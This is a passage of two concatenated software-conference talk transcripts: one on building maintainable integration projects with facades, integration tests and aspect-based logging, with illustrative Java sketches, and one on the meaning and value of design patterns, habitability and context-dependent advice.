most developers use every day, but they might not know that it actually has a name. So when I show you this code later on, you're going to recognize it; you're probably doing it yourself without knowing it has a name. What the facade pattern does is hide the complexity of the API you're using, so that it doesn't infect your code with a lack of quality from within that API.
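The facade idea just described can be sketched in a few lines. The talk's own examples are in C#; this is a rough Java rendering of the same shape, and everything in it is invented for illustration: ClunkyProductApi stands in for whatever awkward third-party API you're wrapping, and its raw attribute names are made up.

```java
// Hypothetical stand-in for an awkward third-party API: it hands back raw,
// untyped attribute maps with cryptic keys. All names here are invented.
class ClunkyProductApi {
    java.util.Map<String, Object> getProduct(String id) {
        java.util.Map<String, Object> raw = new java.util.HashMap<>();
        raw.put("prod_id", id);
        raw.put("prod_stock", 7); // pretend this came over the wire
        return raw;
    }
}

// The facade: the only class in our codebase that knows the clunky API exists.
// Everything else asks the facade a clean, typed question.
class InventoryFacade {
    private final ClunkyProductApi api = new ClunkyProductApi();

    // Returns the stock count, or null if the product is unknown.
    Integer getStock(String productId) {
        java.util.Map<String, Object> raw = api.getProduct(productId);
        if (raw == null) {
            return null;
        }
        Object stock = raw.get("prod_stock");
        return (stock instanceof Integer) ? (Integer) stock : null;
    }
}

class FacadeDemo {
    public static void main(String[] args) {
        InventoryFacade facade = new InventoryFacade();
        System.out.println("stock = " + facade.getStock("ABC-1")); // prints stock = 7
    }
}
```

If the product owner later swaps the vendor out, only the facade changes; every caller keeps asking getStock and never notices.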
And as you're wrapping this API, it also makes it a lot easier to replace that API at some moment in the future, if the customer or the product owner decides that they want to replace that API with another one. You could do that without ripping apart your entire project. Now, the facade pattern could be used in quite a lot of different ways. I'm going to show you a couple of examples here. You could have, for example, here you have a product API, and I have one product facade that uses the product API. Now, any other code in my application that needs something from the product API would use the product facade. We could do the same thing, but with several APIs. If you have more than one API and the data that you receive from those are logical to combine, then you could have one facade using several APIs. For example, here you have the product inventory facade that uses both the product API and an inventory API. Me, myself, I prefer to separate this even more. I prefer to have one facade for each API, but it's a matter of style. You could also have several facades working against one API. For example, here I have one product API, and imagine that this product API contains information about products and their inventories. So now you could create one product facade and one inventory facade, and whenever you need something that has to do with the products, you go towards the product facade. Whenever you need information about the inventory, you use the inventory facade. This is a really logical way of structuring your code. This is separation of concerns, right? If you take a look at some code instead, here's some example code without using a facade. This is a simple Web API controller, or the GET action of a Web API controller, and given a product ID, it returns the inventory. As you can see here, the parts marked in yellow are API calls.
There's one calling a Get method on a dynamic product just to get the product, and then you're getting the number of products in stock by getting the prod stock attribute. Now, this works, but you're mixing responsibilities here. In a Web API controller with a GET action, the responsibility of the action should be to return the correct response. It shouldn't be concerned with how the API is working. So what we do here is that we introduce a facade. We move all the code that has anything to do with the API into an inventory facade. Now you can see the GET action is only concerned with what type of response it should return. It doesn't care about the API anymore. And how does the facade look? Well, it's the same thing, but we just moved all the API calls out into a separate class. And you can also see here that it has a helper facade, the product facade. And this is, as I said, a very logical way of structuring your code. This is how a lot of developers do it, because this enables you to test that GET action in the Web API controller. You wouldn't have been able to test that if you hadn't used the facade. So that's all I'm going to say about facades for now. Let's dig into the more complex stuff. Let's look at integration testing, because when you're working on integration projects, you have to be able to integration test them. This is going to make it a lot easier to maintain in the future, not only for the guy that's there in two or three years' time, but for you as well. So what do you test when you integration test? Well, in integration testing, you could be testing how parts of your system are working together, or how your application is interacting with other systems. So whereas in unit testing, you're only testing code in isolation, in integration testing, you're actually allowed to call APIs. You're allowed to query databases, things you cannot do in unit testing. So these are the things you'd like to test.
You'd like to test internal classes and subsystems. And when I say internal classes, I'm not talking about classes that are marked with internal. What I'm talking about is classes that you have control of, classes that you're responsible for. You could be testing two or three classes and how they are working together, or you could be testing 14, 15 classes and how they are interacting. Now, one thing to remember is that you're not interested in testing all the ifs and the buts. You're interested in testing the end result, or the state of your application, when you're integration testing. The ifs and the buts, those are the responsibility of unit tests. You don't do that in integration testing. You could be testing external components, as I said, calling APIs, querying databases, those kinds of things. This is going to make your tests a lot slower than unit tests, and this means that you won't run them as often. You have to remember to run them often enough to make sure that they're actually useful. And as you might be calling external components or APIs, they're also going to require a lot more setup than a unit test would, because you're not mocking things anymore. You're using the actual implementations. So you might have a lot more setup for your tests than you would in unit testing. And then you could be testing your application service layer. If you have any web services, for example, the Web API controller that I was showing you earlier, you could be integration testing that to make sure that it's working as it should. Now, let's look at some code again. This is our system under test. This is the same Web API controller that we were looking at earlier. And if I were unit testing this, I would mock the inventory facade, and then I'd have one unit test where the inventory facade returned null, just to test the first if statement and that the response was correct.
And then I would have one unit test where the inventory existed, so that I could test the last return statement. But when you're integration testing this, you're not interested in mocking the inventory facade. What you're interested in is seeing how this GET action, how this Web API controller, interacts with the inventory facade. So how do these two classes work together, and what's the state of your code after running this? So let's look at the integration test. As you can see here, it has quite a lot of setup, but it's still not very much. This is actually not very much for an integration test. What you have here, you have the inventory controller, which needs an inventory facade, and the inventory facade is using a product facade. And they're using the actual implementations of those classes. You're not mocking any of them. The only thing I'm mocking here are some application settings, because I'm not interested in how those application settings are retrieved. What I'm interested in is how the Web API controller is working with the inventory facade. Now, the integration test itself is really simple. It sends in a product ID, and it checks that the response it gets is a 200 OK. And this means that the product ID that is sent in has to exist. Now, what happens if a colleague of mine goes in and deletes this product? Well, my integration test is going to break, and that's not good. So you have to make sure that your integration tests are a bit more subtle than this one. So what you could do is, in your integration test, create the product, then test that you're able to retrieve it as you should, and then delete it again. That way, your coworker won't be able to make the test break by doing something in the database. So when working with integration projects, you have to look into the details of integration testing and see how this works. What is going to help your project move on?
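The create-then-verify-then-delete style of integration test described above might look roughly like this. The talk's real example is a C# Web API controller against a database; here every name is invented, and an in-memory repository stands in for the real external system just to keep the sketch runnable. In a real integration test you'd wire up the actual implementations against a test environment.

```java
import java.util.HashMap;
import java.util.Map;

// Stand-in for the real external system (a database or an API).
class ProductRepository {
    private final Map<String, Integer> stock = new HashMap<>();
    void create(String id, int quantity) { stock.put(id, quantity); }
    Integer findStock(String id)         { return stock.get(id); }
    void delete(String id)               { stock.remove(id); }
}

// The code under test, wired up with the real repository, no mocks.
class InventoryService {
    private final ProductRepository repo;
    InventoryService(ProductRepository repo) { this.repo = repo; }

    String describe(String id) {
        Integer quantity = repo.findStock(id);
        return (quantity == null) ? "404 Not Found" : "200 OK: " + quantity;
    }
}

class InventoryIntegrationTest {
    public static void main(String[] args) {
        ProductRepository repo = new ProductRepository();
        InventoryService service = new InventoryService(repo);

        // Create the data the test depends on, so no colleague can break the
        // test by deleting a product it happened to rely on.
        repo.create("TEST-1", 5);
        try {
            // Assert on the end result, not on the ifs and buts inside.
            String response = service.describe("TEST-1");
            if (!response.equals("200 OK: 5")) {
                throw new AssertionError("unexpected response: " + response);
            }
        } finally {
            // Clean up afterwards, leaving the environment as we found it.
            repo.delete("TEST-1");
        }
        System.out.println("integration test passed");
    }
}
```

The try/finally around the assertion is the point: the cleanup runs whether the check passes or fails, so repeated runs don't pollute the test environment.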
Now, the last thing I'd like to look at in the implementation phase, when it comes to the coding part, is logging. We all log when we write code, but the question is, do we log enough? Do we log what is actually interesting? Imagine we have the GetChanges method from one of my first slides, where we figured out which one to use. And this is how a lot of developers log. We have a GetChanges method. It returns the result of the API call, and if there's an exception, they log the exception and they return null. And this is fine. But what happens if your colleague comes to you and says, you know what, I think we might be having some performance issues. I think the GetChanges method takes way too long to execute. Or if they come to you and they say, we're actually updating quite a lot of products, but we can't see them in your application. Are you sure you're retrieving all the changes that you were supposed to? You won't have an answer, will you? Because the only thing you're logging is an exception, and in those two cases, there won't be an exception. So what do you do? Well, you can add lots and lots of logging. Here there's a stopwatch, so you're timing how long the whole method takes to execute. You're also logging the number of products received from the API call, so you know how many there were. It might even be more useful to log the ID of every single product, so that you have all the details. But I mean, this is not what you want, right? You can't see the code anymore, because everything you see is logging. This is not readable code. So I want to log a lot, or I want to log a lot more than what we saw in my previous slide, but I don't want to see it in any way. How do we do that? Well, luckily there are tools you can use. I've been using one called PostSharp, which is quite useful. And here's that same piece of code, except now there's no logging. Or there's no logging that you can see by looking at the code.
The only thing you see here is that I've added a logger attribute, and that takes care of all the logging for you. Now, what does that logger attribute do? Well, you can see it here. PostSharp, you can install that via NuGet, and you get a couple of assemblies containing lots and lots of classes that you can inherit from. One of these is the OnMethodBoundaryAspect. So the logger attribute is inheriting from the OnMethodBoundaryAspect, and that lets you override a couple of methods. Here you see OnEntry, OnSuccess, and OnException. There are also a couple of other ones, but these are the ones I'm going to focus on now. Now, these methods are called like this. As soon as your GetChanges method is entered, the OnEntry method is executed. When the method has run successfully, the OnSuccess method is executed. And if there's an exception, the OnException method is executed. So this means that you could add logging in this logger attribute, and it won't be visible in the code that you're writing. Now, how does this work? Well, if you add this logger attribute that I created to some of your code, and then you decompile it, you can see the details of what PostSharp is doing. And what you can see here is that they're actually adding quite a lot of code. You can see the parts marked in yellow. Here you have the OnEntry, the OnSuccess, and the OnException calls. So what they're doing is that they're actually injecting code into yours. This is called aspect-oriented programming. It's really interesting if you'd like to look at the details of it. Let's look at the attribute itself. Now I've added some logging. The CompileTimeInitialize method, that's something that's run at compile time, and what it does is just store the name of the method that you're currently interested in. Then you have the OnEntry method, and now I'm logging Entering and then the method name.
In OnSuccess, I'm logging Exiting, the method name, with return value, and then the return value. So within these classes, you have access to the return values, the parameters that are sent into your methods, and you have access to any exception and the exception message, if there is an exception. So in the OnException method here, you see that you're logging Exiting, the method name, with exception, and then you're logging the name of that exception. So by using tools like these, you're able to log a lot more than you would in any other project, but it doesn't clutter your code in any way. And you could also add these PostSharp attributes to your code afterwards, if you forgot to add logging, or if you need to debug your code in some way. So I've taken you through the two phases of integration projects, the setup phase and the implementation phase. The setup phase contains every single thing you need to do before you start writing code, and the implementation phase starts the second you sit down and start writing that code. The code you write in integration projects is not that different from code you would write in any other project, but what's important is that you have to focus on maintainability, making it easier for other people to take over that code. So you could use the facade pattern to make your code more loosely coupled and to wrap the APIs. You could use integration testing to make sure that all the systems are communicating as they should. And you could use logging so that you'll be able to figure out what's going on in your application at any moment in time. If you have any questions or you'd like to contact me, here's my Twitter handle and my email address. It's been a pleasure talking to you. Thank you.
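PostSharp's OnMethodBoundaryAspect is specific to .NET, but the underlying idea the talk describes, keeping all the logging out of the business code, can be approximated in other languages too. Here is a rough Java analogue using a dynamic proxy; the ProductService interface and every name in it are invented for illustration, and this is not the talk's actual implementation.

```java
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;

// A hypothetical service whose calls we want logged without cluttering its code.
interface ProductService {
    int getChanges(String since);
}

class ProductServiceImpl implements ProductService {
    public int getChanges(String since) {
        return 3; // pretend this is the API call that fetches changed products
    }
}

// Rough analogue of PostSharp's OnEntry/OnSuccess/OnException hooks: all the
// logging lives in this one handler, not in the business code it wraps.
class LoggingHandler implements InvocationHandler {
    private final Object target;
    LoggingHandler(Object target) { this.target = target; }

    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        System.out.println("Entering " + method.getName());               // OnEntry
        long start = System.nanoTime();
        try {
            Object result = method.invoke(target, args);
            System.out.println("Exiting " + method.getName()
                    + " with return value " + result);                    // OnSuccess
            return result;
        } catch (InvocationTargetException e) {
            System.out.println("Exiting " + method.getName()
                    + " with exception " + e.getCause());                 // OnException
            throw e.getCause();
        } finally {
            long ms = (System.nanoTime() - start) / 1_000_000;
            System.out.println(method.getName() + " took " + ms + " ms"); // the stopwatch
        }
    }
}

class LoggingDemo {
    static ProductService createLoggedService() {
        return (ProductService) Proxy.newProxyInstance(
                ProductService.class.getClassLoader(),
                new Class<?>[] { ProductService.class },
                new LoggingHandler(new ProductServiceImpl()));
    }

    public static void main(String[] args) {
        int changes = createLoggedService().getChanges("2020-01-01");
        System.out.println("changes = " + changes);
    }
}
```

As with the PostSharp attribute, the caller's code stays free of logging; the entry, exit, exception, and timing lines all come from the handler.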
Have you ever received an API or a set of web services that just weren't good enough? This happens more often than we'd like, and when it happens it's important to know what you can do to make sure your project isn't infected with the lack of quality from third-party vendors. I'll talk you through the different stages in your project, highlighting the steps you can take to minimize the risks of integrating your system with another, while making sure it will be maintainable in the future.
10.5446/50612 (DOI)
Right, good afternoon. That's a lot of you. Okay, good. What are we going to talk about? We're going to talk about patterns. And patterns are a fairly familiar topic for a lot of people. Or rather, I think for a lot of people their knowledge of patterns is kind of a lot like my knowledge of Norwegian. I can order a beer. I can order another beer. Once you've got that, you've got the iteration set up. Okay, that's fine. I don't know how to stop ordering beer, but that's okay. You just kind of throw an exception or something. And I can count to ten and I can recognize a few street signs, and that's my Norwegian. That's a lot of people's knowledge of patterns. Normally it goes about as far as, oh, Singleton. So I want to take a slightly different perspective. I want to look at this from the original idea of problem solving. I will use a couple of pattern examples as we go, but really, what was the original intention? Communication, problem solving, and so on. I've been involved in the POSA series, the Pattern-Oriented Software Architecture series of books. I was a principal reviewer on POSA 2 and 4 and co-author of 4 and 5. And at the moment it looks like we're going to do a second edition of POSA 2, and I've been enlisted as an author of that. So we should see if anything happens there. But actually I don't want to start off by referring to these books. I want to start off by referring to another book with the word patterns in the title, one I often draw from these days. It's one of these books that's out of print but is available on the web, on Dick Gabriel's website, as a PDF. Although it's called Patterns of Software, it's not strictly just about patterns. Actually, a lot of it is very autobiographical. It's about his involvement in software, his career. But there are also some other discussions of what we want from software and other thoughts about software and programming languages. It's mid-90s, so a few things have changed since then.
But surprisingly, there's much in this book that is still overlooked. I think one of my favorite passages is the one where he talks about habitability. What do we mean by habitability? Habitability is the characteristic of source code that enables programmers and people coming to the code later in its life to understand its construction and intentions and to change it comfortably and confidently. This is a property that's not identical to the property of maintainability. Sometimes people look at this and say, oh, you mean maintainability? No, because I still don't know what maintainability means. I've only been doing software since, oh, sometime in the last century. I don't know what maintenance is, because when I look at people saying they're doing maintenance, it looks like they're doing product development to me. They're doing continued development. Strictly speaking, we don't really maintain stuff. The ones and zeros don't fall off a piece of code. It's not wear and tear. What most people talk about as maintenance is either fixing problems that were always there, because bugs don't suddenly appear; there's not some kind of spontaneous decay mechanism that takes correct code and replaces it with incorrect code. Although sometimes some of your colleagues may feel like spontaneous bug-introducing mechanisms, that's not how you should think of human beings. So either they're bug fixing, which is called bug fixing, not maintenance, or they are adding new features, which is called adding new features, not maintenance. So this idea of going back into the code, to reread the code for whatever reason, to understand what it is doing, to understand what it is that you want to get from it, why is it doing something and what do you want to add to it? This is a really important thing. It's this question of intention.
Now, those of you who went to my earlier session, I made a couple of points about that, that our big discovery, our big challenge rather, is the discovery of meaning. When you go into a piece of code, it is the meaning that you need to work with. The problem is that we often don't get the meaning, we get the mechanics. You don't get the person's intention. And this is a problem because many of the problems of legacy code, sometimes we like to think of legacy code as a problem that's to do, well, in fact, everybody walks around with a simple definition of legacy code in their head. Legacy code is code somebody else wrote. That's everybody's working model. Okay? A few people have other economically related ones, but as far as most people are concerned, it's code somebody else wrote. And if it was me, well, I was somebody else when I wrote it because clearly no idiot, only an idiot would write this. So it is to do with intention. But it's not just to do with the basic quality. Sometimes people assume legacy code means automatically means bad quality. It doesn't. Sometimes the issue is that a problem was solved. Somebody solved a problem. The code looks odd because it solves a particular problem. And then the cause of that problem went away. We upgraded the hardware, the customer changed their mind about something, the software changed, something changed. And it turns out we're still working against a legacy assumption. So the whole code is bent out of shape. You get this, particularly if you look at a lot of old C code, for example, which I try to avoid, but a lot of old C code has lots of really weird things like arbitrary sizing of things because of memory. And the memory thing's kind of gone away except when it hasn't. And when it hasn't, it looks different anyway. And the problem is people still find themselves contorting around the structures that were placed by a constraint that is no longer there. So somebody did solve a problem. The code is not bad quality. 
It was the right quality at the right time. But what's happened is we no longer understand why it is like this, so nobody's confident about removing it. Maybe removing it will break some constraint. Why is this here? So it turns out that we have many reasons to want habitability. Habitability is also another concept: it is this idea of making a place like home. Habitability makes a place livable, like home or like work. And this is what we want in software, that developers feel at home, can place their hands on any item without having to think deeply about where it is. A kind of intuition that comes with familiarity. But also, the code is where you live. If you work in code, that's where you spend most of your time. You want it to be pleasant and habitable. You want it to be a nice environment, a habitable environment. One where you feel confident not simply locating things but, and I'm going to go further here, actually changing them. Confident to change. This is the resistance that we feel. So where do patterns fit into this? Well, patterns historically have nothing to do with software. So this is one of the first things: whenever anybody says, oh, patterns, that's to do with object-oriented software. No, it's not even to do with any kind of software. It comes from the built environment, which is why the habitability idea is important. So what do we mean by pattern? Well, let's have a look at a couple of things. A regular form or sequence discernible in the way in which something happens or is done. An example for others to follow. Okay, this is good. There's repetition. That's what makes a pattern. So sometimes people will come up with a technique, and it'll be a new technique, and they'll publish it on a website or in a corporate guideline of best practices and patterns. This is fairly standard for a lot of software firms. Here are the patterns. How many times have you used this pattern? Oh, we invented it. We've only used it once. It's not a pattern.
Okay, pattern. The clue is in the word. It repeats. You know, a pattern is a thing that we have seen and we have knowledge of. We have seen it out there in the world and we've got some kind of idea: yeah, this works, or it works in that situation but not in that situation, or this doesn't work at all but people still keep doing it. All of these are patterns. Okay, there must be recurrence. That's not to say that the technique is good or bad when you present a new technique. It can be good or bad, but it's not a pattern until people start doing it. So there's this dysfunctional habit people sometimes have. Another related term is idiom. People say, I've invented a new idiom. It's not an idiom until people start using it. So there's this idea: there's recurrence. Okay, then we have another idea, one which is clearly software motivated. A particular recurring design problem that arises in a specific design context, and presents a well-proven solution for the problem. The solution is specified by describing the roles of its constituent parts, and so on. Right, what we've added there, as well as a lot of jargon, is the idea of context. We see a problem. We see it again. It arises in a particular context. A pattern is a recurring solution to one of these problems, and this is really important. It's a very subtle point, but it's one of the distinctions between what people tend to consider to be principles versus, say, patterns. A pattern is context dependent. That means it solves a particular problem in this particular space, and if you want to apply that pattern elsewhere, it may not work, and that's not a bad thing. Whereas people like to have universal principles. Tell me how to use inheritance. What is the right way to use threads? In other words, there is this idea that there is one right answer to these questions and it will always be true. People like that because it appeals to the way that they think. The problem is that's not how it works.
So when you say, here's a solution but it only works in this context, some people hear: it's not a very good solution because it only works in one context. What you should be hearing is: it is a good solution because it's not general purpose. It works in this context. It is specific, and we know what it does and does not do. That's a really important idea. So with every pattern, with every design idea, when somebody presents it to you, you need to be thinking: what problems does this solve, and when might I not use it? Not just when might I use it. If you cannot find the boundary of it, if you cannot figure out when it's not appropriate advice, then it's not good advice. All advice has a boundary. If you don't know the boundary, then you're not familiar enough with it. So sometimes I joke that if somebody tells you, here's a pattern and it's all fantastic. What are the consequences? What are the liabilities? When might it not work? It always works. They're trying to sell you something. Or they don't know what they're doing. I'll give you a very simple example of context dependency. So my 12-year-old, he walks to school. We trust him to cross roads. He's kind of got his teenage head in the air; it's no longer about the ability to look at cars. But the 8-year-old, he still kind of comes to a road, and what's the advice I offer him? Janik, you always look right first. See the context dependency? It's not bad advice. It's very good advice if you happen to be living in Bristol, in the UK. It works really well there. It works very badly in Norway. And it'll never, ever work in India. It's nothing to do with, as some people think, the side of the road. No. India has a complex adaptive system. Sometimes people at this conference, when they're talking agile development, talk about complex adaptive systems. You do not understand the CAS until you have seen Indian traffic. That's the real CAS. There, you just look everywhere all the time.
That's the pattern you follow. It's context dependent. You do that in Oslo, you get dizzy. So we're solving problems. What we're trying to do here, and the reason the pattern thing is important, is communicate experience. Because otherwise experience remains locked up and unanalyzed in our own heads. You can become really good at something, but it doesn't communicate. But you might not become really good, because it turns out that we're not very good at communicating our own experience of stuff. The late DJ John Peel: I don't make stupid mistakes. Only very, very clever ones. This defines all software developers. You are the elite of the population. Intellectually, you are above pretty much everything else in the population. As a discipline, you are very intelligent, but damn, you make some really clever mistakes. I mean, I look at some of the mistakes and I'm just like, that took a special kind of clever to make that mistake that stupid. You have far greater reach. Stupid people only make simple stupid mistakes. We have such great capacity. And we think, oh, yeah, that's okay. We can adapt to that. Do we? No. There's the XKCD cartoon that points this one out. Until Windows 8, Microsoft hadn't sorted this one out as an issue. They kept trying to do better and better, and then they actually sidestepped the whole problem and said, no, what we're going to do is we're going to give you a visualization. But this is the important point. When is that? That's what, 2012? They had the same problem for over two decades. We don't always respond well to our mistakes. We don't necessarily see the deeper lesson; we think we need a better algorithm. Actually, they just needed a completely different way to present it. And so we set up some of these myths. We set up myths like this. I didn't have to go very far on the web when I looked this up. I looked it up a couple of years ago. I didn't have to go very far. This myth is very, very deeply ingrained.
Failure is a far better teacher than success. Is it? Oh, hell, it is. Christopher Walken, great actor: if you want to learn how to build a house, build a house. Don't ask anybody. Just build a house. Great actor. Terrible teacher. Terrible teacher. This is such bad advice. A house is a complex thing. It turns out, bizarrely enough, we've been building houses for a very long time, and there is a wealth of knowledge about how to do it right. It turns out that if you look at the solution space, the possible arrangements of a thing that could be called a house are huge. The number of them that actually work is tiny. You could wander the wilderness of the solution space for decades before you built a house that didn't burn down, that didn't let in water, all of this kind of stuff. And the worst thing about people that are self-taught is where they eventually end up. You go there and you say, okay, that's kind of... your doors are very interesting. Yeah. None of the angles are at right angles. No, it's my style. They personalize it. They contain it. It's, oh yeah, that's how I do it. It's as if that's somehow kind of okay now. It's special because it's mine. It turns out software development is actually harder than building a house. The stuff we're doing is not physical. It's profoundly abstract. It's intellectual stuff, and then we create lots of it. To make it work is enough of a skill. To make it work effectively and well, and to communicate our intention at the same time: all of this is non-trivial. We have so many paradigms, so many possibilities. Everything is always changing. You know what? Maybe you want to actually do the opposite of this advice. Maybe you want to take advantage of other people's knowledge so that you don't have to make all of their mistakes. Trust me, you'll make enough mistakes. Those will happen.
But the idea of repeating every single mistake? You could go for years without ever discovering simple basic data structures or ideas like that. So when we talk about things like craftsmanship and patterns... in fact, I was interviewed a couple of years ago. Sometimes I get associated with software craftsmanship, and somebody said, so do you see this as being different to patterns, or how do you see it being different to patterns? One of the things that I point out is there's a lot that's different, but one of the things that's really very much the same is the idea of communicating to other people. Look, this is a solved problem. Let me communicate why it's a solved problem, how we solved it, and when it does and does not work, so that you can solve more interesting problems built on it, rather than: feel free, get this one wrong, and then I'll surprise you with the correct answer. This isn't school. We're building real stuff here. So this is not good advice. People don't generally learn when they do it all themselves. This is one of my favorite examples, Ecce Homo. It was painted in the 1930s in a church in Spain, and it fell into, well, need of restoration a few years ago. And then a self-taught local artist, Cecilia Giménez, who was about 80 at the time, decided to restore it when nobody was looking. Yeah, because she's self-taught, because she didn't ask anybody. It turns out people have been doing art for a few centuries as well, and there is a large body of knowledge about how to render effectively, and also a large body of knowledge about how to restore paintings. There is a certain irony to this: the church has now actually made a lot of money out of this, because people go to the church just to see it, and they pay. Cecilia Giménez's family are trying to sue to get some of the money. Anyway, the point here is this is difficult stuff. Ultimately, you need as much knowledge as you can get. And then there's this idea that we simply learn from our mistakes.
Now, we can learn from our mistakes. That's not the same as we do learn from our mistakes. History suggests that human beings do not learn from their mistakes very well at all. But there's one thing that we do that is quite good, and it is our way out of this. Mark Pagel at the University of Reading doubts that hominins before Homo sapiens had what it takes to innovate and exchange ideas, even if they wanted to. He draws a comparison with chimps, which can make crude stone tools but lack technological progress. They mostly learn by trial and error. This is important. You cannot just learn by trial and error, because the error space is far, far larger than the success space. Whereas we learn by watching each other, and we know when something is worth copying. That's the trick. That's the real trick. It's like, oh, you're doing that. That seems to work. I'm going to try doing that. Obviously, as an evolutionary adaptation, this has a few areas where it backfires. It explains all of fashion, for example. Sometimes we copy rubbish. And it takes a while for people to learn, you know, that's really bad. And then 30 years later, it comes back again. But the point is that's a side effect. Copying, the I'm-going-to-try-that-because-that-seems-to-work-for-you move, is a social strategy for searching the rather large error space: we're all doing things that don't work, and that person's done something that works. I wonder what they did that's different. Let's copy that. Very, very simple idea. And yet very, very deeply rooted within us. Again, repetition. It's about the patterns. Is there value in just simply looking at things that don't work? Well, up to a point. But Jim Coplien made this observation a long time ago, nearly 20 years ago, a long time before anti-patterns became a popular idea. He was already suspicious of the premise. I mean, I just don't like the term.
I don't think anti-pattern makes sense, because as a piece of vocabulary, anti-patterns are patterns. They're just dysfunctional ones. There's no kind of anti-pattern meets pattern and they wipe each other out with a puff of gamma radiation or something like that. No. Anti-patterns don't provide a resolution of forces, as patterns do. And they are dangerous as teaching tools. Good pedagogy builds on positive examples that students can remember rather than negative examples. They might be a good diagnostic tool to understand system problems. And that's interesting, because the idea was then reinvented as smells. These days, people are more likely to write about code smells and architecture smells and so on than they are about anti-patterns. But the terms are effectively equivalent. There's this idea that we see certain bad examples, but that's not a really good starting point. I can show you lots of ways of not programming. From that, can you deduce good ways of programming? Well, probably not. And this is like any other human activity. We copy what we see as right. So what we're saying with patterns is actually something far, far more sophisticated. Whilst it is possible sometimes to extract knowledge from certain forms of failure and certain errors, we do a lot better when we actually communicate and share things that work, and then reason about why they work. And we see this in a term that's pretty much equivalent, an idea that came around at a similar time to patterns being adopted in software. This book by Mary Shaw and David Garlan is widely regarded as one of the key works in the discipline of software architecture, which was a very ad hoc discipline. I'm not necessarily going to say that everything that's come out of the concept of software architecture has been good. But as a formalized approach, there's this book, about 20 years old, and it had quite a lot to offer. But it's very much of historical value now.
I went back to it a couple of years ago and it's not as interesting now. There are better books. But they made an observation. They said, look, one of the hallmarks of architectural design is the use of idiomatic patterns of system organization. Many of these patterns are architectural styles. They basically say these concepts, these terms, are effectively equivalent, and have been developed over the years. System designers recognize the value of specific organizational principles and structures for certain classes of software. So we're back to that idea, although they're coming in from a different angle. They're basically saying: certain kinds of problems in certain kinds of context. We've seen things that work. We've seen other things that don't work as well. We like these things that work. Why do they work, and how can we talk about them? What vocabulary can we offer people? How do we communicate what works and how to create solutions that are viable? And this fitted with the introduction of patterns into software. The first introduction of patterns into the software development space was in 1987, by Ward Cunningham and Kent Beck, respectively, I guess, best known these days as the inventor of the wiki and as the father of XP and of modern test-driven development. They came across this book and others by Christopher Alexander, which detailed the idea of patterns for building architecture, the built environment. How to lay out your home, how to organize a city. So quite a range of detail there: where do I put my keys when I walk in the front door, versus how should we define the relationship between the city and the surrounding countryside? So quite a broad scope in his work. He wrote this trilogy in reverse, obviously, because that's how you do trilogies. Part three was published in 1975. Part two was published in 1977. Part one, this one, was published in 1979. And he makes a very simple observation.
We know that every pattern is an instruction of the general form: a context giving rise to conflicting forces (the nature of the problem, in other words), giving rise to a configuration, about which we can then discuss the trade-offs. But there is this idea that the context is the anchor. And the context, what does that mean in programming? Well, it can mean pretty much anything. Context can mean programming language. You may be familiar with techniques that work in one programming language that make no sense, or solve no problem, or cannot even be expressed in another language. These are patterns that you have learned for effective communication. Sometimes people try to distinguish these as idioms, but it turns out that doesn't make as much sense as they thought it did. They're just patterns. These are patterns with the language as part of the context. There's a bunch of techniques for dealing with memory management, for example, in something like C++ that make absolutely no sense in something like Java, because they cannot make sense: you cannot even express the basis of the problem or the solution. On the other hand, there are looping and collection and iteration styles that we find in common across a number of languages, C#, Java, C++. There are elements that are very similar, and that are fundamentally different to the styles of iteration that we find in other languages such as Ruby, Smalltalk, and the functional languages. These are very, very different styles. So language and language family become part of the context. But so do the other technology and architectural choices, the patterns you have already chosen. If you're in a single-threaded, event-driven system, then your design decisions and the context you're working in are going to look very, very different to if you are in a multi-threaded system, plain and simple.
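That contrast in iteration styles can be sketched in Java. This is a minimal illustration, not from the talk: the class and method names are invented, and the stream version here stands in for the internal, behaviour-passing style native to Smalltalk, Ruby and the functional languages.

```java
import java.util.List;

public class IterationStyles {

    // External iteration: the caller drives the loop step by step,
    // the style common to C, C++, Java and C#.
    static int sumExternal(List<Integer> values) {
        int total = 0;
        for (int value : values) {
            total += value;
        }
        return total;
    }

    // Internal iteration: the collection drives the loop and the
    // caller only supplies behaviour (here via Java streams).
    static int sumInternal(List<Integer> values) {
        return values.stream().mapToInt(Integer::intValue).sum();
    }

    public static void main(String[] args) {
        List<Integer> values = List.of(1, 2, 3, 4);
        System.out.println(sumExternal(values)); // 10
        System.out.println(sumInternal(values)); // 10
    }
}
```

Both compute the same sum, but who is in control of the loop differs, which is exactly the kind of thing that makes a technique idiomatic in one language family and alien in another.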
If you're writing top-down code that is processing something algorithmically, it's going to look very different, and the trade-offs and the techniques you're going to care about are going to look very, very different to something that is in an interactive environment sitting within a framework. So the context shifts: each time one of these decisions is made, you change the context. The context defines the characteristics of what causes a problem and what you can do about it. But that's not the most interesting bit. This is really simple, and yet we fail so often when we talk about techniques. We say a pattern is good whenever we can show it meets the following two empirical conditions. Notice a couple of things. One, he says there is such a thing as a good pattern, and he later defines the idea of a bad pattern. So it turns out that for what many people call anti-patterns, actually we just use kids' vocabulary. We just call them good and bad. The patterns that people repeat that aren't any good are bad patterns. There's nothing anti about them. They're just not very good. There's no sexy Latin term for them. The other thing is that this is an empirical approach. Let's look at the first thing. The problem is real. In other words, when somebody proposes a technique, even without thinking about patterns, if somebody proposes a coding guideline, if somebody proposes a particular architectural decision, if somebody offers you a technique or a general approach to something, the first thing you need to do is check: is the problem real? Are they imagining a problem, or is it real? Far too often we fill things like coding guidelines and architecture documents, and people's heads, with things that, well, could be a problem. Yeah, you're right, we need to solve it. It could be a problem, but many of the things that people imagine are simply not problems. So first of all, do you have the problem we actually propose to solve?
